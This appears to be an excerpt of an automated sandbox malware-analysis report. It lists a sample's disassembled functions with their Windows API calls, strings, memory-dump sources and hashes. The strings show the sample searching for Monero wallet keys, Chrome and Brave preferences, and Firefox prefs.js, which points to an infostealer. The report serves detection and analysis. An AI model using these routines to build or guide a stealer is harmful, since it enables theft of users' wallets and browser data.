                            • Instruction Fuzzy Hash: 3CA11FB29002189BDB25EB64DC85FFE7379BB58700F04858DE60DD6141EB759B88CF62
                            Function 003BBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                            • FindFirstFileA.KERNEL32(00000000,?,003D0B32,003D0B2B,00000000,?,?,?,003D13F4,003D0B2A), ref: 003BBEF5
                            • StrCmpCA.SHLWAPI(?,003D13F8), ref: 003BBF4D
                            • StrCmpCA.SHLWAPI(?,003D13FC), ref: 003BBF63
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 003BC7BF
                            • FindClose.KERNEL32(000000FF), ref: 003BC7D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 3334442632-726946144
                            • Opcode ID: fd0d50910f226d212c98d2e3c45cd025e8b90e4ad75df8cd163f43a07beab093
                            • Instruction ID: 6df49409570f79f787eab31721544b4a32ba33fc9a0099d665ab035fcd2a5e87
                            • Opcode Fuzzy Hash: fd0d50910f226d212c98d2e3c45cd025e8b90e4ad75df8cd163f43a07beab093
                            • Instruction Fuzzy Hash: E7424172910208ABCB16FBA0DD56FED737DAB94304F40455CB50ADA181EE34AF49CBA2
                            Function 003C4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 003C492C
                            • FindFirstFileA.KERNEL32(?,?), ref: 003C4943
                            • StrCmpCA.SHLWAPI(?,003D0FDC), ref: 003C4971
                            • StrCmpCA.SHLWAPI(?,003D0FE0), ref: 003C4987
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 003C4B7D
                            • FindClose.KERNEL32(000000FF), ref: 003C4B92
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s$%s\%s$%s\*
                            • API String ID: 180737720-445461498
                            • Opcode ID: a5356c46127db98b7d515bb8a6529bf0d3582db4a1f47908ed97860c7fd955fd
                            • Instruction ID: eddd97862906906f075b95d25ca67f360c63fa4247b087b0f71bf903429f4ca7
                            • Opcode Fuzzy Hash: a5356c46127db98b7d515bb8a6529bf0d3582db4a1f47908ed97860c7fd955fd
                            • Instruction Fuzzy Hash: 446143B2900218ABCB25EBA0DC55FFA737CBB58700F04458DE64DD6141EB75AB49CFA2
                            Function 003C4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003C4580
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003C4587
                            • wsprintfA.USER32 ref: 003C45A6
                            • FindFirstFileA.KERNEL32(?,?), ref: 003C45BD
                            • StrCmpCA.SHLWAPI(?,003D0FC4), ref: 003C45EB
                            • StrCmpCA.SHLWAPI(?,003D0FC8), ref: 003C4601
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 003C468B
                            • FindClose.KERNEL32(000000FF), ref: 003C46A0
                            • lstrcat.KERNEL32(?,0108E7E8), ref: 003C46C5
                            • lstrcat.KERNEL32(?,0108DA20), ref: 003C46D8
                            • lstrlen.KERNEL32(?), ref: 003C46E5
                            • lstrlen.KERNEL32(?), ref: 003C46F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                            • String ID: %s\%s$%s\*
                            • API String ID: 671575355-2848263008
                            • Opcode ID: 6cc8881169fa7666e191d7ef0f0f8dc0e72dc8f964c3b9b8e056bc5bf0f42634
                            • Instruction ID: da9fc257f4bdeeac3befd856386d896b1fbb3d644005a4b51e11fdc9cf03de30
                            • Opcode Fuzzy Hash: 6cc8881169fa7666e191d7ef0f0f8dc0e72dc8f964c3b9b8e056bc5bf0f42634
                            • Instruction Fuzzy Hash: 0C5155B29002189BC725EB70DC99FF9737CAB58700F404589F60DD6150EB759B89CFA2
                            Function 003C3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 003C3EC3
                            • FindFirstFileA.KERNEL32(?,?), ref: 003C3EDA
                            • StrCmpCA.SHLWAPI(?,003D0FAC), ref: 003C3F08
                            • StrCmpCA.SHLWAPI(?,003D0FB0), ref: 003C3F1E
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 003C406C
                            • FindClose.KERNEL32(000000FF), ref: 003C4081
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 180737720-4073750446
                            • Opcode ID: f371cfb9a96fdd8b6a16076b56890c7b6ecb5e22ae64201bfda9fc796562259b
                            • Instruction ID: 0ae97cde06227abe8a5e156c2689f9517c932902129a64a4dbd54c0765aa2c26
                            • Opcode Fuzzy Hash: f371cfb9a96fdd8b6a16076b56890c7b6ecb5e22ae64201bfda9fc796562259b
                            • Instruction Fuzzy Hash: 925101B2900218ABCB25EBA0DC45FFA737CBB58700F40458DB65DD6140EB75AB89DF52
                            Function 003BED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 003BED3E
                            • FindFirstFileA.KERNEL32(?,?), ref: 003BED55
                            • StrCmpCA.SHLWAPI(?,003D1538), ref: 003BEDAB
                            • StrCmpCA.SHLWAPI(?,003D153C), ref: 003BEDC1
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 003BF2AE
                            • FindClose.KERNEL32(000000FF), ref: 003BF2C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 180737720-1013718255
                            • Opcode ID: f088188a00a4f208c9097435934d6be68dc08b800b660a0091884ba675d2bf85
                            • Instruction ID: e18af265c2f1ec67bab2880a0eacd616d4fe1e4fea6df826672053ea7d1ba6e4
                            • Opcode Fuzzy Hash: f088188a00a4f208c9097435934d6be68dc08b800b660a0091884ba675d2bf85
                            • Instruction Fuzzy Hash: 8DE12D7281161C9BDB16EB60DC52FEE7738AF54304F40419DB50AAA092EF306F8ADF52
                            Function 003BF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003D15B8,003D0D96), ref: 003BF71E
                            • StrCmpCA.SHLWAPI(?,003D15BC), ref: 003BF76F
                            • StrCmpCA.SHLWAPI(?,003D15C0), ref: 003BF785
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 003BFAB1
                            • FindClose.KERNEL32(000000FF), ref: 003BFAC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: prefs.js
                            • API String ID: 3334442632-3783873740
                            • Opcode ID: d77bf2dd91b21de5e53ade630d45d31a2a7379041993d4651e10308a2dce8628
                            • Instruction ID: 9b3ce9b5916bb5da73f4bc6c4d89b1e6ede926bbbecb6a168e0fc834dddccf87
                            • Opcode Fuzzy Hash: d77bf2dd91b21de5e53ade630d45d31a2a7379041993d4651e10308a2dce8628
                            • Instruction Fuzzy Hash: 2CB14E719006089BCB26EB60DC96FEE7779AF54304F4085ADA50ADA181EF306F49CF92
                            Function 003B16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003D510C,?,?,?,003D51B4,?,?,00000000,?,00000000), ref: 003B1923
                            • StrCmpCA.SHLWAPI(?,003D525C), ref: 003B1973
                            • StrCmpCA.SHLWAPI(?,003D5304), ref: 003B1989
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003B1D40
                            • DeleteFileA.KERNEL32(00000000), ref: 003B1DCA
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 003B1E20
                            • FindClose.KERNEL32(000000FF), ref: 003B1E32
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 1415058207-1173974218
                            • Opcode ID: c2bb70d07bbc9d17438b48187ff79eafbe1f4ae75f6f7936575228da11740e48
                            • Instruction ID: 7ea48e0572a445ec50f9ca73c0fe291525833055e0d230af46d4738ac5b1cf1b
                            • Opcode Fuzzy Hash: c2bb70d07bbc9d17438b48187ff79eafbe1f4ae75f6f7936575228da11740e48
                            • Instruction Fuzzy Hash: C612EE7191061C9BDB16EB60DC96FEE7778AF54304F40419DA10AEA091EF306F89DF92
                            Function 003BDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,003D0C2E), ref: 003BDE5E
                            • StrCmpCA.SHLWAPI(?,003D14C8), ref: 003BDEAE
                            • StrCmpCA.SHLWAPI(?,003D14CC), ref: 003BDEC4
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 003BE3E0
                            • FindClose.KERNEL32(000000FF), ref: 003BE3F2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                            • String ID: \*.*
                            • API String ID: 2325840235-1173974218
                            • Opcode ID: 374e26a5d3b506e7683b6e735074abf2eed36ba0d87a9638a2854f8bc3d0ebb2
                            • Instruction ID: a7e08904b4a463a82633a1d093aebe47f33c9bef258e4caeb95074b0ad303125
                            • Opcode Fuzzy Hash: 374e26a5d3b506e7683b6e735074abf2eed36ba0d87a9638a2854f8bc3d0ebb2
                            • Instruction Fuzzy Hash: ABF19E7181061C9BDB26EB60DC96FEE7778BF14304F80419EA50AA6091EF346F4ADF52
                            Function 003BDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003D14B0,003D0C2A), ref: 003BDAEB
                            • StrCmpCA.SHLWAPI(?,003D14B4), ref: 003BDB33
                            • StrCmpCA.SHLWAPI(?,003D14B8), ref: 003BDB49
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 003BDDCC
                            • FindClose.KERNEL32(000000FF), ref: 003BDDDE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID:
                            • API String ID: 3334442632-0
